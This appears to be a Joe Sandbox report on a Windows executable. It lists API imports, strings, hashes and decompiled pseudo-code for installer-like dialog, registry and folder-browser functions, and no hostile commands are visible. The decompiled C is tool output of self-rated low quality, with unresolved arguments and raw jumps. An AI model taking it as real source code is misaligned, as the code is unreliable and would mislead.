0x7ff64c5175ac
0x7ff64c5175b1
0x7ff64c5175b8
0x7ff64c5175c5
0x7ff64c5175cd
0x7ff64c5175d7
0x7ff64c5175df
0x7ff64c5175e9
0x7ff64c5175f1
0x7ff64c5175fb
0x7ff64c517603
0x7ff64c517605
0x7ff64c51760a
0x7ff64c517618
0x7ff64c517627
0x7ff64c517644
0x7ff64c517646
0x7ff64c517649
0x7ff64c51764b
0x7ff64c51764d
0x7ff64c51764f
0x7ff64c517655
0x7ff64c51765a
0x7ff64c517663
0x7ff64c517667
0x7ff64c51766a
0x7ff64c51766f
0x7ff64c51767b
0x7ff64c51767e
0x7ff64c51768d
0x7ff64c517692
0x7ff64c51769c
0x7ff64c51769e
0x7ff64c5176ac
0x7ff64c5176b8
0x7ff64c5176be
0x7ff64c5176ef

APIs

CharNextA.USER32 ref: 00007FF64C517120
GetModuleFileNameA.KERNEL32 ref: 00007FF64C5171FB
CharUpperA.USER32 ref: 00007FF64C51723E
CharUpperA.USER32 ref: 00007FF64C5172D4
CompareStringA.KERNEL32 ref: 00007FF64C517368
CharUpperA.USER32 ref: 00007FF64C5173A3
CharUpperA.USER32 ref: 00007FF64C5173FF
CharUpperA.USER32 ref: 00007FF64C517498
CloseHandle.KERNEL32 ref: 00007FF64C51769E
ExitProcess.KERNEL32 ref: 00007FF64C5176AC

Strings

:, xrefs: 00007FF64C517443
RegServer, xrefs: 00007FF64C517359
@, xrefs: 00007FF64C51767E
", xrefs: 00007FF64C517187

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$:$@$RegServer
API String ID: 1203814774-4077547207
Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
Instruction ID: 13bdec925afad7438aa2ad35717105df72fd39d630fb6bd0f103f20171893072
Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
Instruction Fuzzy Hash: C802CE21E0C68285EA6CBF2C940C67D6FA1AF427D0F580537D97E86795CE3DE962C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C513910 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00007FF67FF64C513910(void* __edx, void* __esi, void* __eflags, void* __rax, long long __rbx, long long __rcx, long long __rsi, void* __r8, long long _a8, long long _a16) {
				signed int _v16;
				signed int _v24;
				void* _t16;
				signed int _t27;
				void* _t57;
				long long _t66;
				long long _t69;
				long long _t81;
				void* _t83;
				void* _t92;
				void* _t94;

				_t57 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_t83 = __r8;
				_t81 = __rcx;
				if (__eflags == 0) goto 0x4c513b12;
				if (__eflags == 0) goto 0x4c513b0c;
				if (__eflags == 0) goto 0x4c513a11;
				if (__eflags == 0) goto 0x4c51397b;
				if (__edx - 0xffffffffffffff0f == 0xe90) goto 0x4c51395b;
				goto 0x4c513b29;
				TerminateThread(??, ??);
				goto 0x4c513b1a;
				if (__r8 != 2) goto 0x4c513b26;
				ResetEvent(??);
				_t66 =  *0x4c51c828; // 0x0
				r9d = 0;
				_v16 = 4;
				_v24 = 0x20;
				_t16 = E00007FF67FF64C514DCC(_t66, 0x4c519700, _t92, _t94);
				if (_t16 == 6) goto 0x4c5139e4;
				if (_t16 == 1) goto 0x4c5139e4;
				SetEvent(??);
				goto 0x4c513b26;
				 *0x4c51d5fc = 1;
				SetEvent(??);
				_t69 =  *0x4c51ca58; // 0x0
				E00007FF67FF64C513B40(_t69, 0x4c519700);
				goto 0x4c513b18;
				 *0x4c51c828 = _t81;
				GetDesktopWindow();
				E00007FF67FF64C514C68(_t16 - 1, __rbx, _t81, _t57, 0x4c519700, _t92);
				if ( *0x4c51c1ac == 0) goto 0x4c513a9b;
				GetDlgItem(??, ??);
				r9d = 0xbb9;
				r8d = r8d ^ r8d;
				SendMessageA(??, ??, ??, ??);
				GetDlgItem(??, ??);
				SendMessageA(??, ??, ??, ??);
				SetWindowTextA(??, ??);
				r9d = r9d ^ r9d;
				_v16 = 0x4c51ca50;
				_v24 = _v24 & 0x00000000;
				_t27 = CreateThread(??, ??, ??, ??, ??, ??);
				 *0x4c51ca58 = 0x4c51ca50;
				if (0x4c51ca50 != 0) goto 0x4c513b26;
				_v16 = _v16 & _t27;
				r9d = 0;
				r8d = 0;
				_v24 = 0x10;
				E00007FF67FF64C514DCC(_t81, E00007FF67FF64C515D90, 0xffff0000, _t94);
				goto 0x4c513a09;
				if (_t83 != 0x1b) goto 0x4c513b26;
				 *0x4c51d5fc = 1;
				return EndDialog(??, ??);
			}

0x7ff64c513910
0x7ff64c513910
0x7ff64c513915
0x7ff64c51391f
0x7ff64c513922
0x7ff64c51392d
0x7ff64c513939
0x7ff64c513942
0x7ff64c51394a
0x7ff64c513952
0x7ff64c513956
0x7ff64c513964
0x7ff64c513976
0x7ff64c51397f
0x7ff64c51398c
0x7ff64c513998
0x7ff64c5139a6
0x7ff64c5139a9
0x7ff64c5139b6
0x7ff64c5139be
0x7ff64c5139c6
0x7ff64c5139ca
0x7ff64c5139d3
0x7ff64c5139df
0x7ff64c5139eb
0x7ff64c5139f1
0x7ff64c5139fd
0x7ff64c513a04
0x7ff64c513a0c
0x7ff64c513a11
0x7ff64c513a18
0x7ff64c513a2a
0x7ff64c513a36
0x7ff64c513a42
0x7ff64c513a4e
0x7ff64c513a54
0x7ff64c513a5f
0x7ff64c513a70
0x7ff64c513a8f
0x7ff64c513aa5
0x7ff64c513ab8
0x7ff64c513abb
0x7ff64c513ac7
0x7ff64c513ad0
0x7ff64c513adc
0x7ff64c513ae6
0x7ff64c513ae8
0x7ff64c513aec
0x7ff64c513aef
0x7ff64c513af2
0x7ff64c513b02
0x7ff64c513b07
0x7ff64c513b10
0x7ff64c513b12
0x7ff64c513b38

APIs

TerminateThread.KERNEL32 ref: 00007FF64C513964
ResetEvent.KERNEL32 ref: 00007FF64C51398C
SetEvent.KERNEL32 ref: 00007FF64C5139D3
GetDesktopWindow.USER32 ref: 00007FF64C513A18
GetDlgItem.USER32 ref: 00007FF64C513A42
SendMessageA.USER32 ref: 00007FF64C513A5F
GetDlgItem.USER32 ref: 00007FF64C513A70
SendMessageA.USER32 ref: 00007FF64C513A8F
SetWindowTextA.USER32 ref: 00007FF64C513AA5
CreateThread.KERNEL32 ref: 00007FF64C513AD0
EndDialog.USER32 ref: 00007FF64C513B1A

Strings

Maintal, xrefs: 00007FF64C513A9B
, xrefs: 00007FF64C5139B6

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
String ID: $Maintal
API String ID: 2654313074-3681620210
Opcode ID: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
Instruction ID: 50a18d803af5e492968551fc6eb145dedd7f9a7f9860d366633f3bdec4be3270
Opcode Fuzzy Hash: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
Instruction Fuzzy Hash: C8516F31E0C64286E718BF19E85C27D6EA1FB89B95F449233D96E83798DF3CA465C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C514A60 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514A86
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514AAA
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514ACA
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514AEC
GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514B1B
CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514B3A
CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514B54
FreeLibrary.KERNEL32 ref: 00007FF64C514BF1
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64C5135E3), ref: 00007FF64C514C0D

Strings

SHELL32.DLL, xrefs: 00007FF64C514A7F
SHBrowseForFolder, xrefs: 00007FF64C514AA0
SHGetPathFromIDList, xrefs: 00007FF64C514AE2

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
Instruction ID: d045111355cfb5ab56711c987c42ddab08c279e2fd8b1084f053e0b562d070aa
Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
Instruction Fuzzy Hash: DE517C25E0DA8286EB09BF19A81817D7EA0FB89B90F445136DE6E83794DF3CE454C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C514DCC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00007FF67FF64C514DCC(void* __rcx, void* __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				char _t27;
				void* _t31;
				int _t32;
				void* _t34;
				void* _t42;
				int _t43;
				signed long long _t76;
				void* _t80;
				void* _t83;
				void* _t84;
				void* _t86;
				signed long long _t87;
				signed long long _t88;
				void* _t93;
				void* _t95;
				void* _t99;
				void* _t109;
				void* _t114;
				void* _t115;
				signed long long _t116;
				long long _t130;

				_t114 = _t115 - 0x180;
				_t116 = _t115 - 0x280;
				_t76 =  *0x4c51c008; // 0xdeba5460e397
				 *(_t114 + 0x170) = _t76 ^ _t116;
				_t26 =  *0x4c519938; // 0x2e656372
				_t130 = __r9;
				asm("movups xmm0, [0x4b01]");
				 *((intOrPtr*)(_t116 + 0x60)) = _t26;
				_t27 =  *0x4c51993c; // 0x0
				asm("movups xmm1, [0x4afa]");
				 *((char*)(_t116 + 0x64)) = _t27;
				asm("movups [esp+0x30], xmm0");
				asm("movups xmm0, [0x4aef]");
				asm("movups [esp+0x40], xmm1");
				asm("movups [esp+0x50], xmm0");
				if (( *0x4c51cd18 & 0x00000001) != 0) goto 0x4c515026;
				r9d = 0x200;
				 *((char*)(_t116 + 0x70)) = 0;
				LoadStringA(??, ??, ??, ??);
				if ( *((char*)(_t116 + 0x70)) != 0) goto 0x4c514eb5;
				if (E00007FF67FF64C517F04(_t87, _t109, __r8, _t116 + 0x70) == 0) goto 0x4c514e8b;
				_t31 = E00007FF67FF64C517E34(_t87, _t114);
				r9d = 0x190010;
				if (_t31 != 0) goto 0x4c514e91;
				r9d = 0x10010;
				_t32 = MessageBoxA(??, ??, ??, ??);
				goto 0x4c515026;
				_t88 = _t87 | 0xffffffff;
				if (_t130 == 0) goto 0x4c514f31;
				_t80 = _t88 + 1;
				if ( *((char*)(_t130 + _t80)) != 0) goto 0x4c514ec1;
				_t93 = _t88 + 1;
				if ( *((char*)(__r8 + _t93)) != 0) goto 0x4c514ece;
				_t107 = _t116 + 0x70;
				_t95 = _t88 + 1;
				if ( *((char*)(_t116 + 0x70 + _t95)) != 0) goto 0x4c514ee2;
				_t83 = _t80 + _t93 + 0x64 + _t95;
				r15d = _t32;
				LocalAlloc(??, ??);
				if (_t83 == 0) goto 0x4c515024;
				 *((long long*)(_t116 + 0x20)) = _t130;
				_t34 = E00007FF67FF64C51114C(_t83, _t116 + 0x70, _t116 + 0x70, __r8);
				goto 0x4c514fbc;
				_t84 = _t83 + 1;
				if ( *((char*)(_t116 + 0x70 + _t84)) != 0) goto 0x4c514f36;
				if (__r8 == 0) goto 0x4c514f8e;
				_t99 = _t88 + 1;
				if ( *((char*)(__r8 + _t99)) != 0) goto 0x4c514f47;
				_t86 = _t84 + 0x64 + _t99;
				r14d = _t34;
				LocalAlloc(??, ??);
				if (_t86 == 0) goto 0x4c515024;
				E00007FF67FF64C51114C(_t86, _t116 + 0x70, _t116 + 0x70, __r8);
				goto 0x4c514fbc;
				LocalAlloc(??, ??);
				if (_t86 == 0) goto 0x4c515024;
				E00007FF67FF64C511008(_t86, _t107, _t116 + 0x70, __r10);
				MessageBeep(??);
				if (E00007FF67FF64C517F04(_t88, _t86, __r8, _t116 + 0x70) == 0) goto 0x4c514fe6;
				_t42 = E00007FF67FF64C517E34(_t88, _t114);
				r9d = 0x190000;
				if (_t42 != 0) goto 0x4c514fec;
				r9d = 0x10000;
				r9d = r9d |  *(_t114 + 0x1e0);
				r9d = r9d |  *(_t114 + 0x1e8);
				_t43 = MessageBoxA(??, ??, ??, ??);
				LocalFree(??);
				return E00007FF67FF64C518470(_t43,  *(_t114 + 0x1e0),  *(_t114 + 0x170) ^ _t116);
			}

0x7ff64c514dd7
0x7ff64c514ddf
0x7ff64c514de6
0x7ff64c514df0
0x7ff64c514df7
0x7ff64c514dfd
0x7ff64c514e00
0x7ff64c514e07
0x7ff64c514e0e
0x7ff64c514e17
0x7ff64c514e1e
0x7ff64c514e2d
0x7ff64c514e32
0x7ff64c514e39
0x7ff64c514e3e
0x7ff64c514e43
0x7ff64c514e55
0x7ff64c514e5b
0x7ff64c514e60
0x7ff64c514e71
0x7ff64c514e7a
0x7ff64c514e7c
0x7ff64c514e81
0x7ff64c514e89
0x7ff64c514e8b
0x7ff64c514ea0
0x7ff64c514eb0
0x7ff64c514eb5
0x7ff64c514ebf
0x7ff64c514ec1
0x7ff64c514ec9
0x7ff64c514ece
0x7ff64c514ed5
0x7ff64c514eda
0x7ff64c514ee2
0x7ff64c514ee9
0x7ff64c514eef
0x7ff64c514ef9
0x7ff64c514efc
0x7ff64c514f0e
0x7ff64c514f17
0x7ff64c514f27
0x7ff64c514f2c
0x7ff64c514f36
0x7ff64c514f3d
0x7ff64c514f42
0x7ff64c514f47
0x7ff64c514f4e
0x7ff64c514f54
0x7ff64c514f5e
0x7ff64c514f61
0x7ff64c514f73
0x7ff64c514f87
0x7ff64c514f8c
0x7ff64c514f99
0x7ff64c514fab
0x7ff64c514fb7
0x7ff64c514fc2
0x7ff64c514fd5
0x7ff64c514fd7
0x7ff64c514fdc
0x7ff64c514fe4
0x7ff64c514fe6
0x7ff64c514fec
0x7ff64c514ffa
0x7ff64c515007
0x7ff64c515018
0x7ff64c515046

APIs

LoadStringA.USER32 ref: 00007FF64C514E60
LocalAlloc.KERNEL32 ref: 00007FF64C514F61
LocalAlloc.KERNEL32 ref: 00007FF64C514F99
MessageBoxA.USER32 ref: 00007FF64C514EA0

Part of subcall function 00007FF64C517E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF64C517E8C
Part of subcall function 00007FF64C517E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF64C517ECA

LocalAlloc.KERNEL32 ref: 00007FF64C514EFC
MessageBeep.USER32 ref: 00007FF64C514FC2
MessageBoxA.USER32 ref: 00007FF64C515007
LocalFree.KERNEL32 ref: 00007FF64C515018

Part of subcall function 00007FF64C517F04: GetVersionExA.KERNEL32 ref: 00007FF64C517F59
Part of subcall function 00007FF64C517F04: GetSystemMetrics.USER32 ref: 00007FF64C517F93
Part of subcall function 00007FF64C517F04: RegOpenKeyExA.ADVAPI32 ref: 00007FF64C517FC8
Part of subcall function 00007FF64C517F04: RegQueryValueExA.ADVAPI32 ref: 00007FF64C518003
Part of subcall function 00007FF64C517F04: RegCloseKey.ADVAPI32 ref: 00007FF64C518016
Part of subcall function 00007FF64C517F04: CharNextA.USER32 ref: 00007FF64C518065

Strings

Maintal, xrefs: 00007FF64C514E91, 00007FF64C514FF3
rce., xrefs: 00007FF64C514DF7

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
String ID: Maintal$rce.
API String ID: 2929476258-4232535448
Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
Instruction ID: 76b8979073a4a3acb07e9a51f5d991a9e2569ad3dcad8dbe35599f490e270310
Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
Instruction Fuzzy Hash: 0B61D121E0C7C186FB19BF69A8083BD6E90AB59BA4F445232DE6D83395DF3CE591C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C51261C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129
registryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00007FF67FF64C51261C(long long __rbx, long long __rcx, void* __rdx, char* __r8) {
				void* __rsi;
				void* __rbp;
				char _t30;
				void* _t44;
				char _t58;
				signed long long _t67;
				signed long long _t68;
				long long _t76;
				char* _t82;
				void* _t83;
				CHAR* _t100;
				void* _t102;
				CHAR* _t107;
				void* _t110;
				signed long long _t111;
				void* _t120;
				CHAR* _t121;
				CHAR* _t124;

				_t95 = __rdx;
				 *((long long*)(_t110 + 0x10)) = __rbx;
				_t108 = _t110 - 0x60;
				_t111 = _t110 - 0x160;
				_t67 =  *0x4c51c008; // 0xdeba5460e397
				_t68 = _t67 ^ _t111;
				 *(_t110 - 0x60 + 0x50) = _t68;
				 *((intOrPtr*)(__rcx)) = dil;
				_t76 = __rcx;
				_t4 =  &(_t100[1]); // 0x1
				r15d = _t4;
				if ( *__r8 != 0x23) goto 0x4c5127e0;
				CharUpperA(_t124);
				CharNextA(_t121);
				CharNextA(_t100);
				_t105 = _t68;
				if (r14b == 0x53) goto 0x4c5127dd;
				if (r14b == 0x57) goto 0x4c5127c7;
				 *((intOrPtr*)(_t111 + 0x34)) = 0x104;
				_t82 = _t111 + 0x40;
				_t8 = _t95 + 0x7ffffefa; // 0x7ffffffe
				if (_t8 == 0) goto 0x4c5126e5;
				_t30 =  *((intOrPtr*)("Software\\Microsoft\\Windows\\CurrentVersion\\App Paths" - _t111 + 0x40 + _t82));
				_t58 = _t30;
				if (_t58 == 0) goto 0x4c5126e5;
				 *_t82 = _t30;
				_t83 = _t82 + _t124;
				if (_t58 != 0) goto 0x4c5126c7;
				_t72 =  !=  ? _t83 : _t83 - 1;
				 *((intOrPtr*)( !=  ? _t83 : _t83 - 1)) = dil;
				E00007FF67FF64C517BA8(0x104,  !=  ? _t83 : _t83 - 1, __rcx, _t111 + 0x40, _t68, _t110 - 0x60, _t68);
				r9d = 0x20019;
				r8d = 0;
				 *((long long*)(_t111 + 0x20)) = _t111 + 0x38;
				if (RegOpenKeyExA(??, ??, ??, ??, ??) != 0) goto 0x4c5127f5;
				 *((long long*)(_t111 + 0x28)) = _t111 + 0x34;
				r8d = 0;
				 *((long long*)(_t111 + 0x20)) = _t76;
				if (RegQueryValueExA(??, ??, ??, ??, ??, ??) != 0) goto 0x4c5127b4;
				if ( *((intOrPtr*)(_t111 + 0x30)) != 2) goto 0x4c5127ad;
				r8d = 0x104;
				if (ExpandEnvironmentStringsA(??, ??, ??) == 0) goto 0x4c5127a9;
				E00007FF67FF64C511008(_t76, _t111 + 0x40, _t111 + 0x40, _t120);
				goto 0x4c5127b4;
				_t53 =  ==  ? r15d : r15d;
				RegCloseKey(_t102);
				goto 0x4c5127f1;
				GetWindowsDirectoryA(_t107);
				goto 0x4c5127f5;
				GetSystemDirectoryA(??, ??);
				_t65 =  ==  ? r15d : r15d;
				if (( ==  ? r15d : r15d) != 0) goto 0x4c512805;
				E00007FF67FF64C517BA8(0x104, _t111 + 0x34, _t76, _t76, _t68, _t108, _t105);
				return E00007FF67FF64C518470(r15d, _t44,  *(_t108 + 0x50) ^ _t111);
			}

0x7ff64c51261c
0x7ff64c51261c
0x7ff64c512628
0x7ff64c51262d
0x7ff64c512634
0x7ff64c51263b
0x7ff64c51263e
0x7ff64c512647
0x7ff64c51264a
0x7ff64c512651
0x7ff64c512651
0x7ff64c512655
0x7ff64c512662
0x7ff64c512674
0x7ff64c512683
0x7ff64c51268f
0x7ff64c512696
0x7ff64c5126a0
0x7ff64c5126ad
0x7ff64c5126c2
0x7ff64c5126c7
0x7ff64c5126d1
0x7ff64c5126d3
0x7ff64c5126d7
0x7ff64c5126d9
0x7ff64c5126db
0x7ff64c5126dd
0x7ff64c5126e3
0x7ff64c5126f4
0x7ff64c5126fd
0x7ff64c512700
0x7ff64c51270a
0x7ff64c512710
0x7ff64c512713
0x7ff64c512732
0x7ff64c512742
0x7ff64c51274c
0x7ff64c51274f
0x7ff64c512769
0x7ff64c512772
0x7ff64c512774
0x7ff64c512790
0x7ff64c51279f
0x7ff64c5127a7
0x7ff64c5127b0
0x7ff64c5127b9
0x7ff64c5127c5
0x7ff64c5127cf
0x7ff64c5127db
0x7ff64c5127e5
0x7ff64c5127f1
0x7ff64c5127f3
0x7ff64c512800
0x7ff64c51282a

APIs

CharUpperA.USER32 ref: 00007FF64C512662
CharNextA.USER32 ref: 00007FF64C512674
CharNextA.USER32 ref: 00007FF64C512683
RegOpenKeyExA.ADVAPI32 ref: 00007FF64C512724
RegQueryValueExA.ADVAPI32 ref: 00007FF64C51275B
ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF64C512782
RegCloseKey.ADVAPI32 ref: 00007FF64C5127B9
GetWindowsDirectoryA.KERNEL32 ref: 00007FF64C5127CF
GetSystemDirectoryA.KERNEL32 ref: 00007FF64C5127E5

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00007FF64C5126A6

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
Instruction ID: e2f7fb3dc07e9d2f0c1ada4025b1fb8eb5a0aca0acf7d0036fa75a69f051ec88
Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
Instruction Fuzzy Hash: 30517036A0C68186EB14BF18F8482BE7BA0FB8AB90F545032DA6E43795DF3CD555C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5133F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF64C513430
GetDesktopWindow.USER32 ref: 00007FF64C513441
SetDlgItemTextA.USER32 ref: 00007FF64C513467
SetWindowTextA.USER32 ref: 00007FF64C51347D
SetForegroundWindow.USER32 ref: 00007FF64C51348C
GetDlgItem.USER32 ref: 00007FF64C5134A0
GetWindowLongPtrA.USER32 ref: 00007FF64C5134B7
SetWindowLongPtrA.USER32 ref: 00007FF64C5134D9
SendDlgItemMessageA.USER32 ref: 00007FF64C51350A

Strings

Maintal, xrefs: 00007FF64C513473

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: Maintal
API String ID: 3785188418-1608070445
Opcode ID: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
Instruction ID: 637ae13506779cd3d7f370983830601c10e101493515eb818122715e2c000492
Opcode Fuzzy Hash: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
Instruction Fuzzy Hash: B8314475D0C642C6E6187F29A81C27C7FA1FB8AB51F459232C97E82395DF7CA459C600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C517F04 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF64C517F59
GetSystemMetrics.USER32 ref: 00007FF64C517F93
RegOpenKeyExA.ADVAPI32 ref: 00007FF64C517FC8
RegQueryValueExA.ADVAPI32 ref: 00007FF64C518003
RegCloseKey.ADVAPI32 ref: 00007FF64C518016
CharNextA.USER32 ref: 00007FF64C518065

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00007FF64C517FBA

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
